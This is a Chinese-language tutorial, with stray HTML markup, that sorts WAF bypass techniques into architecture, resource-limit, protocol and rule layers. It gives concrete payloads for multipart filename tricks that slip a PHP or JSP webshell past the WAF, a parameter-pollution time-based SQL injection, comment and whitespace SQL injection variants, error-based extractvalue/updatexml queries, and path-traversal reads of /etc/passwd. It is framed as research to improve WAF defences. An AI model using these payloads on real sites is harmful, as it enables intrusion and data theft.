WAF攻防研究之四个层次Bypass WAF 教学文档<\/h1>

1. WAF绕过技术概述<\/h2>

WAF(Web应用防火墙)绕过技术研究是提升WAF防御能力的重要途径。本文从四个层次系统性地讲解WAF绕过技术：<\/p>

架构层绕过<\/li>
资源限制角度绕过<\/li>
协议层面绕过<\/li>

规则缺陷绕过<\/li> <\/ol>

2. 架构层绕过技术<\/h2>

2.1 寻找源站IP<\/h3>

原理<\/strong>：当流量不经过WAF时，WAF无法检测攻击请求。<\/p>

方法<\/strong>：<\/p>

信息泄露：检查网站注销页面、GitHub源码、历史DNS记录<\/li>
搜索引擎缓存：查找未接入WAF前的IP记录<\/li>
IP穷举扫描：扫描国内IP段，匹配网站特征<\/li> <\/ul>
2.2 利用同网段<\/h3>
原理<\/strong>：同一云服务商内网流量可能不经过WAF检测。<\/p>
方法<\/strong>：<\/p>

在目标站点同一云服务商购买VPS<\/li>
通过内网直接攻击目标服务器<\/li> <\/ol>
2.3 利用边界漏洞<\/h3>
原理<\/strong>：通过子站的SSRF漏洞访问主站可能绕过WAF。<\/p>
方法<\/strong>：<\/p>

寻找子站SSRF漏洞<\/li>
通过SSRF访问主站内部接口<\/li> <\/ol>
3. 资源限制角度绕过<\/h2>
原理<\/strong>：WAF为避免资源消耗过大，可能只检测请求前部分内容。<\/p>
方法<\/strong>：<\/p>

在POST BODY前添加大量无用数据<\/li>
将攻击payload放在请求末尾<\/li>
典型大小：超过2MB可能绕过检测<\/li> <\/ul>
4. 协议层面绕过<\/h2>
4.1 协议未覆盖绕过<\/h3>
案例<\/strong>：<\/p>

WAF未覆盖multipart\/form-data<\/code>类型请求<\/li>
或仅检测文件上传部分而忽略表单参数<\/li> <\/ul> 4.2 协议解析不一致<\/h3> PHP文件名解析漏洞<\/strong>：<\/p> WAF解析文件名：test3.jpg<\/li> PHP解析文件名：shell.php<\/li> <\/ul> 4.3 文件上传协议绕过技术<\/h3> 4.3.1 文件名覆盖(一)<\/h4> Content-Disposition: form-data; name="file"; filename="sp.pho" Content-Disposition: form-data; name="file"; filename="sp.php" <\/code><\/pre> WAF取第一个，后端取最后一个<\/p> 4.3.2 文件名覆盖(二)<\/h4> Content-Disposition: form-data; name="myfile"; filename="p3.txt";filename="t3.jsp" <\/code><\/pre> WAF解析到第一个filename，后端解析到最后一个<\/p> 4.3.3 遗漏文件名<\/h4> Content-Disposition: form-data;name="myfile";; filename="t3.jsp" <\/code><\/pre> WAF遇到;;<\/code>认为无filename，后端继续解析<\/p> 4.3.4 未解析所有文件<\/h4> WAF只检查第一个上传文件<\/li> 后端解析所有上传文件<\/li> 将payload放在后面的文件PART<\/li> <\/ul> 4.3.5 文件名解析兼容性<\/h4> filename="abc.php \/\/ 缺少右引号 filename=abc.php \/\/ 无引号 filename='abc.php' \/\/ 单引号 <\/code><\/pre> WAF按标准解析失败，后端容器兼容解析成功<\/p> 4.4 参数污染<\/h3> \/forum.php?typeid=644&typeid=if(now()%3dsysdate()%2csleep(19.844)%2c0) <\/code><\/pre> WAF检查第一个参数值，后端使用第二个参数值<\/p> 5. 规则层面绕过<\/h2> 5.1 SQL注入绕过技术<\/h3> 5.1.1 注释符绕过<\/h4> union\/**\/select union\/*aaaa%01bbs*\/select union\/*aaaaaaaaaaaaaaaaaaaa*\/select <\/code><\/pre> 5.1.2 空白符绕过<\/h4> union%250Cselect union%25A0select <\/code><\/pre> 利用MySQL与正则表达式空白符差异<\/p> 5.1.3 函数分隔符<\/h4> concat%2520( concat\/**\/( concat%250c( concat%25a0( <\/code><\/pre> 5.1.4 浮点数词法解析<\/h4> 8E0union select 8.0union select \Nunion select <\/code><\/pre> 5.1.5 Error-based函数<\/h4> extractvalue(1, concat(0x5c,md5(3))) updatexml(1, concat(0x5d,md5(3)),1) GeometryCollection((select from(select from(select@@version)f)x)) <\/code><\/pre> 5.1.6 MySQL特殊语法<\/h4> select{x table_name}from{x information_schema.tables} <\/code><\/pre> 5.2 文件包含绕过<\/h3> 5.2.1 相对路径绕过<\/h4> etc\/\/passwd \/\/ 等价于etc\/passwd <\/code><\/pre> 5.2.2 绝对路径绕过<\/h4> \/etc\/.\/passwd \/wtt\/..\/etc\/passwd <\/code><\/pre> 5.2.3 协议绕过<\/h4> PHP支持的协议：<\/p> file:\/\/, http:\/\/, ftp:\/\/, php:\/\/ zlib:\/\/, data:\/\/, glob:\/\/, phar:\/\/ ssh2:\/\/, rar:\/\/, ogg:\/\/, expect:\/\/ <\/code><\/pre> 6. 总结<\/h2> WAF绕过技术研究需要深入理解：<\/p> HTTP协议及其实现差异<\/li> 后端容器协议解析特性<\/li> 数据库词法分析机制<\/li> 系统文件路径解析规则<\/li> <\/ol> 通过多层次的测试和验证，才能全面评估WAF的防御能力并持续改进。<\/p>